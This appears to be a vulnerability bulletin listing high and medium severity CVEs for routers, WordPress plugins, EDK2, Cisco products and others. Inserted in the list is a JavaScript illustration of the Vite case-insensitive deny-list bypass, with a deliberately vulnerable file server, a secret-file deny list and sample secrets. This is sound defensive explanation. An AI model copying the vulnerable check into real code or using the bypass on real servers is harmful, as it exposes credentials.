tenda -- w9_firmware | A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been declared as critical. Affected by this vulnerability is the function formAddSysLogRule of the component httpd. The manipulation of the argument sysRulenEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250711. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 9.8 | CVE-2024-0541 | cna@vuldb.com
tenda -- w9_firmware | A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been rated as critical. Affected by this issue is the function formWifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250712. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 9.8 | CVE-2024-0542 | cna@vuldb.com
themely -- theme_demo_import | The Theme Demo Import WordPress plugin before 1.1.1 does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed. | 2024-01-16 | 7.2 | CVE-2022-1538 | contact@wpscan.com
tianocore -- edk2 | EDK2's Network Package is susceptible to a buffer overflow vulnerability via a long server ID option in the DHCPv6 client. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability. | 2024-01-16 | 8.3 | CVE-2023-45230 | infosec@edk2.groups.io
tianocore -- edk2 | EDK2's Network Package is susceptible to a buffer overflow vulnerability when processing the DNS Servers option from a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability. | 2024-01-16 | 8.3 | CVE-2023-45234 | infosec@edk2.groups.io
tianocore -- edk2 | EDK2's Network Package is susceptible to a buffer overflow vulnerability when handling the Server ID option from a DHCPv6 proxy Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability. | 2024-01-16 | 8.3 | CVE-2023-45235 | infosec@edk2.groups.io
tianocore -- edk2 | EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing unknown options in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability. | 2024-01-16 | 7.5 | CVE-2023-45232 | infosec@edk2.groups.io
tianocore -- edk2 | EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing a PadN option in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability. | 2024-01-16 | 7.5 | CVE-2023-45233 | infosec@edk2.groups.io
totolink -- ex1800t_firmware | TOTOlink EX1800T V9.1.0cu.2112_B20220316 was discovered to contain a remote command execution (RCE) vulnerability via the telnet_enabled parameter of the setTelnetCfg interface. | 2024-01-12 | 9.8 | CVE-2023-52026 | cve@mitre.org
totolink -- lr1200gb_firmware | A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. This issue affects the function setSmsCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument text leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0571 | cna@vuldb.com
totolink -- lr1200gb_firmware | A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0572 | cna@vuldb.com
totolink -- lr1200gb_firmware | A vulnerability has been found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this vulnerability is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250789 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0573 | cna@vuldb.com
totolink -- lr1200gb_firmware | A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this issue is the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250790 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0574 | cna@vuldb.com
totolink -- lr1200gb_firmware | A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been classified as critical. This affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250791. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0575 | cna@vuldb.com
totolink -- lr1200gb_firmware | A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been declared as critical. This vulnerability affects the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sPort leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250792. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0576 | cna@vuldb.com
totolink -- lr1200gb_firmware | A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250793 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0577 | cna@vuldb.com
totolink -- lr1200gb_firmware | A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument File leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250794 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0578 | cna@vuldb.com
totolink -- n350rt | A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability. | 2024-01-16 | 7.3 | CVE-2024-0570 | cna@vuldb.com
totolink -- x2000r_firmware | A vulnerability classified as critical was found in Totolink X2000R 1.0.0-B20221212.1452. Affected by this vulnerability is the function formMapDelDevice of the file /boafrm/formMapDelDevice. The manipulation of the argument macstr leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250795. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-16 | 9.8 | CVE-2024-0579 | cna@vuldb.com
totolink -- x6000r_firmware | An issue discovered in TOTOLINK X6000R V9.4.0cu.852_B20230719 allows attackers to run arbitrary code via the sub_410118 function of the shttpd program. | 2024-01-16 | 9.8 | CVE-2023-52041 | cve@mitre.org
totolink -- x6000r_firmware | An issue discovered in the sub_4117F8 function in TOTOLINK X6000R V9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the 'lang' parameter. | 2024-01-16 | 9.8 | CVE-2023-52042 | cve@mitre.org
traccar -- traccar | Traccar is an open source GPS tracking system. Prior to 5.11, Traccar is affected by an unrestricted file upload vulnerability in its File feature that allows attackers to execute arbitrary code on the server. The impact is greater because Traccar is recommended to be run as the root user, and because the upload can write or overwrite files in arbitrary locations. Version 5.11 was published to fix this vulnerability. | 2024-01-15 | 9.8 | CVE-2023-50729 | security-advisories@github.com
tribe29 -- checkmk | Privilege escalation in the mk_tsm agent plugin in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows a local user to escalate privileges. | 2024-01-12 | 7.8 | CVE-2023-6735 | security@checkmk.com
tribe29 -- checkmk | Privilege escalation in the jar_signature agent plugin in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows a local user to escalate privileges. | 2024-01-12 | 7.8 | CVE-2023-6740 | security@checkmk.com
troglobit -- libeuv | uev (aka libuev) before 2.4.1 has a buffer overflow in epoll_wait if maxevents is a large number. | 2024-01-12 | 9.8 | CVE-2022-48620 | cve@mitre.org
verydows -- verydows | Verydows v2.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /protected/controller/backend/role_controller. | 2024-01-12 | 8.8 | CVE-2023-51949 | cve@mitre.org
vinoj_cardoza -- 3d_tag_cloud | Cross-Site Request Forgery (CSRF) vulnerability in Vinoj Cardoza 3D Tag Cloud allows Stored XSS. This issue affects 3D Tag Cloud: from n/a through 3.8. | 2024-01-17 | 7.1 | CVE-2022-41990 | audit@patchstack.com
vitejs -- vite | Vite is a frontend tooling framework for JavaScript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092, with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate, a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers. | 2024-01-19 | 7.5 | CVE-2024-23331 | security-advisories@github.com
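The mismatch the Vite entry describes, as an added illustration that is not Vite's code: a constructed stand-in for a case-insensitive filesystem, a hypothetical minimal glob compiler standing in for `picomatch`, and the deny check in its vulnerable shape (case-sensitive patterns in front of a case-folding read) next to a hardened shape that folds case in the matcher whenever the filesystem does. The project layout, file contents and deny list are constructed sample data.

```javascript
// Added illustration (not Vite's code) of the CVE-2024-23331 failure mode:
// a case-sensitive deny-list matcher in front of a case-insensitive filesystem.

// Constructed stand-in for a case-insensitive filesystem such as NTFS:
// lookups ignore case, exactly as the real file server's read would.
class CaseInsensitiveFs {
  constructor(files) {
    this.files = new Map(
      Object.entries(files).map(([name, body]) => [name.toLowerCase(), body])
    );
  }
  read(p) {
    const body = this.files.get(p.toLowerCase());
    if (body === undefined) throw new Error(`ENOENT: ${p}`);
    return body;
  }
}

// Hypothetical minimal glob compiler standing in for picomatch. Supports
// "**/" (any directory depth), "*" (within one path segment) and "?".
function globToRegExp(glob, nocase) {
  let re = "";
  for (let i = 0; i < glob.length; i++) {
    const c = glob[i];
    if (c === "*" && glob[i + 1] === "*" && glob[i + 2] === "/") {
      re += "(?:.*/)?";
      i += 2;
    } else if (c === "*") {
      re += "[^/]*";
    } else if (c === "?") {
      re += "[^/]";
    } else {
      re += c.replace(/[.+^${}()|[\]\\]/g, "\\$&");
    }
  }
  return new RegExp(`^${re}$`, nocase ? "i" : "");
}

function makeDenyMatcher(globs, nocase) {
  const patterns = globs.map((g) => globToRegExp(g, nocase));
  return (rel) => patterns.some((re) => re.test(rel));
}

// Resolve the requested path under an absolute root (no trailing slash)
// and reject traversal out of it. Small posix normaliser so the example
// has no dependencies.
function resolveUnderRoot(root, requested) {
  const out = [];
  for (const seg of `${root}/${requested}`.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop();
    else out.push(seg);
  }
  const abs = "/" + out.join("/");
  if (abs !== root && !abs.startsWith(root + "/")) throw new Error("outside root");
  return { abs, rel: abs.slice(root.length + 1) };
}

// Vulnerable shape: deny patterns are compared case-sensitively, but the
// read that follows folds case, so ".ENV" slips past "**/.env".
function serveVulnerable(fs, root, denyGlobs, requested) {
  const isDenied = makeDenyMatcher(denyGlobs, false);
  const { abs, rel } = resolveUnderRoot(root, requested);
  if (isDenied(rel)) return { status: 403 };
  return { status: 200, body: fs.read(abs) };
}

// Hardened shape: if the filesystem folds case, the deny list must too, so
// every spelling that reaches the same bytes on disk is rejected alike.
function serveHardened(fs, root, denyGlobs, requested, fsIsCaseInsensitive) {
  const isDenied = makeDenyMatcher(denyGlobs, fsIsCaseInsensitive);
  const { abs, rel } = resolveUnderRoot(root, requested);
  if (isDenied(rel)) return { status: 403 };
  return { status: 200, body: fs.read(abs) };
}

// Constructed sample project and a deny list in the server.fs.deny style.
const sampleFs = new CaseInsensitiveFs({
  "/app/.env": "DB_PASSWORD=hunter2",
  "/app/certs/server.pem": "-----BEGIN PRIVATE KEY-----",
  "/app/src/index.js": "export default 1;",
});
const denyList = ["**/.env", "**/.env.*", "**/*.pem"];
```

Against `sampleFs`, `serveVulnerable` returns 403 for `.env` but 200 with the secret for `.ENV` and `certs/SERVER.PEM`; `serveHardened` with `fsIsCaseInsensitive` set returns 403 for both spellings and still serves `src/index.js`. Whether to fold case is a property of the host filesystem, not of the request, so the flag belongs in server configuration detected at startup rather than in per-request logic; comparing the canonical on-disk path (realpath) against the deny list is the more general alternative and also covers symlinks, which this example does not address.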
vmware -- aria_automation/cloud_foundation | Aria Automation contains a Missing Access Control vulnerability. An authenticated malicious actor may exploit this vulnerability leading to unauthorized access to remote organizations and workflows. | 2024-01-16 | 9.9 | CVE-2023-34063 | security@vmware.com
vyperlang -- vyper | Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. The `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. The buffer overflow can result in the change of semantics of the contract. The overflow is length-dependent and thus it might go unnoticed during contract testing. However, certainly not all usages of concat will result in overwritten valid data, as the call must be in an internal function and close to the return statement where other memory allocations don't occur. This issue has been addressed in commit `55e18f6d1` which will be included in future releases. Users are advised to update when possible. | 2024-01-18 | 7.3 | CVE-2024-22419 | security-advisories@github.com
warfareplugins -- social_sharing_plugin_'swp_url'_social_warfare | The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swp_url' parameter. This allows attackers to execute code on the server. | 2024-01-17 | 10.0 | CVE-2021-4434 | security@wordfence.com
wazuh -- wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. This bug introduced a stack overflow hazard that could allow a local privilege escalation. This vulnerability was patched in version 4.5.3. | 2024-01-12 | 7.4 | CVE-2023-42463 | security-advisories@github.com
webtoffee -- stripe_payment_plugin_for_woocommerce | The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-01-19 | 9.8 | CVE-2024-0705 | security@wordfence.com
wpdeveloper -- essential_blocks | The Essential Blocks WordPress plugin before 4.4.3 does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks. | 2024-01-15 | 9.8 | CVE-2023-6623 | contact@wpscan.com
wpexperts -- post_smtp_mailer | The POST SMTP Mailer WordPress plugin before 2.8.7 does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high privilege users such as admin. | 2024-01-15 | 7.2 | CVE-2023-6620 | contact@wpscan.com
wpfastestcache -- wp_fastest_cache | The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber. | 2024-01-16 | 8.8 | CVE-2021-24869 | contact@wpscan.com
wpforms -- wpforms_pro | The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-01-20 | 7.2 | CVE-2023-7063 | security@wordfence.com
xorg -- xorg-server | A flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context. | 2024-01-18 | 7.8 | CVE-2024-0409 | secalert@redhat.com
xorg-server -- xorg-server | A flaw was found in the X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used. | 2024-01-18 | 7.8 | CVE-2023-6816 | secalert@redhat.com
yugeshverma -- online_lawyer_management_system | A vulnerability was found in Project Worlds Lawyer Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file searchLawyer.php. The manipulation of the argument experience leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250603. | 2024-01-13 | 9.8 | CVE-2024-0498 | cna@vuldb.com
yunyou -- cms | A vulnerability has been found in Yunyou CMS up to 2.2.6 and classified as critical. This vulnerability affects unknown code of the file /app/index/controller/Common.php. The manipulation of the argument templateFile leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251374 is the identifier assigned to this vulnerability. | 2024-01-17 | 7.3 | CVE-2024-0648 | cna@vuldb.com
zhicms -- zhicms | A vulnerability classified as critical has been found in ZhiCms up to 4.0. This affects an unknown part of the file app/plug/controller/giftcontroller.php. The manipulation of the argument mylike leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250839. | 2024-01-16 | 7.3 | CVE-2024-0603 | cna@vuldb.com

Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
ELAN -- match-on-Chip_FPR | The ELAN Match-on-Chip FPR solution has a design fault that risks leakage and enumeration of valid SIDs via a spoofed sensor. This fault allows Windows Hello recognition to be bypassed by cloning a SID, breaking account identity. Versions lower than 3.0.12011.08009 (Legacy) / 3.3.12011.08103 (ESS) are affected on the DELL Inspiron platform. | 2024-01-12 | 6.0 | CVE-2024-0454 | 36106deb-8e95-420b-a0a0-e70af5d245df
ability -- ability_ftp_server | A vulnerability has been found in Ability FTP Server 2.34 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component APPE Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250717 was assigned to this vulnerability. | 2024-01-15 | 5.3 | CVE-2024-0547 | cna@vuldb.com
acritum_femitter -- acritum_femitter_server | A vulnerability, which was classified as problematic, was found in Acritum Femitter Server 1.04. Affected is an unknown function. The manipulation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250446 is the identifier assigned to this vulnerability. | 2024-01-12 | 4.3 | CVE-2010-10011 | cna@vuldb.com
adobe -- acrobat_for_edge | Acrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-01-15 | 5.5 | CVE-2024-20709 | psirt@adobe.com
adobe -- acrobat_for_edge | Acrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-01-15 | 5.5 | CVE-2024-20721 | psirt@adobe.com
adobe -- adobe_experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-01-18 | 5.4 | CVE-2023-51463 | psirt@adobe.com
adobe -- adobe_experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-01-18 | 5.4 | CVE-2023-51464 | psirt@adobe.com
advanced-woo-search -- advanced_woo_search | The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed. | 2024-01-13 | 6.1 | CVE-2024-0251 | security@wordfence.com
algolplus -- advanced_dynamic_pricing_for_woocommerce | Missing Authorization vulnerability in AlgolPlus Advanced Dynamic Pricing for WooCommerce. This issue affects Advanced Dynamic Pricing for WooCommerce: from n/a through 4.1.5. | 2024-01-17 | 6.3 | CVE-2022-40203 | audit@patchstack.com
allegro -- rompager | A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure. | 2024-01-14 | 4.3 | CVE-2024-0522 | cna@vuldb.com
apollo -- apollo | A vulnerability was found in Apollo 2.0.0/2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /users of the component Configuration Center. The manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-250430 is the identifier assigned to this vulnerability. NOTE: The maintainer explains that user data information like user id, name, and email are not sensitive. | 2024-01-12 | 4.3 | CVE-2022-4962 | cna@vuldb.com
avaya -- experience_portal_manager | Insecure Direct Object Reference vulnerabilities were discovered in the Avaya Aura Experience Portal Manager which may allow partial information disclosure to an authenticated non-privileged user. Affected versions include 8.0.x and 8.1.x, prior to 8.1.2 patch 0402. Versions prior to 8.0 are end of manufacturer support. | 2024-01-17 | 5.7 | CVE-2023-7031 | securityalerts@avaya.com
aveva -- pi_server | AVEVA PI Server versions 2023 and 2018 SP3 P05 and prior contain a vulnerability that could allow an unauthenticated user to cause the PI Message Subsystem of a PI Server to consume available memory, resulting in throttled processing of new PI Data Archive events and a partial denial-of-service condition. | 2024-01-18 | 5.3 | CVE-2023-31274 | ics-cert@hq.dhs.gov
avo-hq -- avo | Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade. | 2024-01-16 | 6.5 | CVE-2024-22411 | security-advisories@github.com
ays-pro -- quiz_maker | Improper input validation vulnerability in WordPress Quiz Maker Plugin prior to 6.5.0.6 allows a remote authenticated attacker to perform a Denial of Service (DoS) attack against external services. | Published 2024-01-12 | CVSS 6.5 | CVE-2024-22027 | Source: vultures@jpcert.or.jp
brainstorm -- ultimate_addons_for_beaver_builder - lite | Missing Authorization vulnerability in Brainstorm Force Ultimate Addons for Beaver Builder - Lite. This issue affects Ultimate Addons for Beaver Builder - Lite: from n/a through 1.5.5. | Published 2024-01-17 | CVSS 4.3 | CVE-2023-23882 | Source: audit@patchstack.com
brechtvds -- wp_recipe_maker | The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | Published 2024-01-18 | CVSS 6.4 | CVE-2023-6958 | Source: security@wordfence.com
brechtvds -- wp_recipe_maker | The WP Recipe Maker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'Referer' header in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | Published 2024-01-18 | CVSS 6.1 | CVE-2023-6970 | Source: security@wordfence.com
brechtvds -- wp_recipe_maker | The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | Published 2024-01-18 | CVSS 6.4 | CVE-2024-0381 | Source: security@wordfence.com
carmelogarcia -- employee_profile_management_system | A vulnerability, which was classified as problematic, was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_position_query.php. The manipulation of the argument pos_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250572. | Published 2024-01-12 | CVSS 6.1 | CVE-2024-0467 | Source: cna@vuldb.com
centralsquare -- click2gov_building_permit | An issue was discovered in CentralSquare Click2Gov Building Permit before October 2023. Lack of access control protections allows remote attackers to arbitrarily delete the contractors from any user's account when the user ID and contractor information is known. | Published 2024-01-12 | CVSS 4.3 | CVE-2023-40362 | Source: cve@mitre.org
cisco -- WAP371_wireless-AC/N_dual_radio_access_point_(AP)_with_single_point_setup | A vulnerability in the web-based management interface of the Cisco WAP371 Wireless-AC/N Dual Radio Access Point (AP) with Single Point Setup could allow an authenticated, remote attacker to perform command injection attacks against an affected device. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the device. To exploit this vulnerability, the attacker must have valid administrative credentials for the device. | Published 2024-01-17 | CVSS 6.5 | CVE-2024-20287 | Source: ykramarz@cisco.com
cisco -- cisco_identity_services_engine_software | A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | Published 2024-01-17 | CVSS 4.8 | CVE-2024-20251 | Source: ykramarz@cisco.com
cisco -- cisco_prime_infrastructure | A vulnerability in the web-based management interface of Cisco Prime Infrastructure could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system. This vulnerability is due to improper processing of serialized Java objects by the affected application. An attacker could exploit this vulnerability by uploading a document containing malicious serialized Java objects to be processed by the affected application. A successful exploit could allow the attacker to cause the application to execute arbitrary commands. | Published 2024-01-17 | CVSS 6.5 | CVE-2023-20258 | Source: ykramarz@cisco.com
cisco -- cisco_prime_infrastructure | A vulnerability in the application CLI of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager could allow an authenticated, local attacker to gain escalated privileges. This vulnerability is due to improper processing of command line arguments to application scripts. An attacker could exploit this vulnerability by issuing a command on the CLI with malicious options. A successful exploit could allow the attacker to gain the escalated privileges of the root user on the underlying operating system. | Published 2024-01-17 | CVSS 6 | CVE-2023-20260 | Source: ykramarz@cisco.com
cisco -- cisco_prime_infrastructure | A vulnerability in the web-based management interface of Cisco Prime Infrastructure could allow an authenticated, remote attacker to conduct cross-site scripting attacks. This vulnerability is due to improper validation of user-supplied input to the web-based management interface. An attacker could exploit this vulnerability by submitting malicious input containing script or HTML content within requests that would be stored within the application interface. A successful exploit could allow the attacker to conduct cross-site scripting attacks against other users of the affected application. | Published 2024-01-17 | CVSS 4.8 | CVE-2023-20257 | Source: ykramarz@cisco.com
cisco -- cisco_thousandeyes_recorder_application | A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root. | Published 2024-01-17 | CVSS 6.8 | CVE-2024-20277 | Source: ykramarz@cisco.com
cisco -- broadworks | A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | Published 2024-01-17 | CVSS 4.8 | CVE-2024-20270 | Source: ykramarz@cisco.com
